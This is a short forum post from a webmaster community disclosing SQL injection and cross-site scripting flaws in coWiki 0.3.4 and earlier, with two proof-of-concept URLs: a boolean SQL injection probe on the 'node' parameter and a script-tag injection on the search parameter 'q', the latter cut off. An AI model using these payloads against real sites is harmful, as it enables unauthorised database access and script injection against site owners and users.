SQL Injection and XSS vulnerability in coWiki

Professional Webmasters Community :: Webmaster Speak :: Tech Talk

Page 1 of 1

SQL Injection and XSS vulnerability in coWiki

andry Wed Aug 11, 2010 11:50 pm

SQL Injection:

http://site/index.php?node=-1 '% 20or% 20version ()% 3E'5

Vulnerable coWiki 0.3.4 and previous versions.

XSS:

Vulnerability in the main script in the parameter q.

http://site/?cmd=srchdoc&q =% 22% 3E% 3Cscript% 3Ealert (document

andry: Moderator; Posts : 467
Join date : 2010-05-07